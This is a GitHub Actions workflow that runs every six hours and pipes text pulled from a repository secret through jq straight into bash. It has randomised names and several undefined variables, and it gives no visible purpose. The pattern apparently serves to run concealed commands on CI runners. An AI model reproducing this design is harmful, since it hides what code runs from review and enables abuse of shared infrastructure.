name: yupubox

on:
  workflow_dispatch:
  schedule:
    - cron: '24 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yupubox
        env:
          sa03: ${{ secrets.sa03 }}
        run: |
          echo $sa03 | jq -r .sfuig5960 | /bin/bash
          echo $l83 | jq -r .nfhpf44 | /bin/bash
          echo $fkmqo0 | jq -r .bh61 | /bin/bash
          echo $muegm7880 | jq -r .onlpc57 | /bin/bash
          echo $bk40 | jq -r .db441 | /bin/bash
          echo $evktr7437 | jq -r .u9018 | /bin/bash
          echo $uv28777 | jq -r .vo2358 | /bin/bash
          echo $y9 | jq -r .m1 | /bin/bash

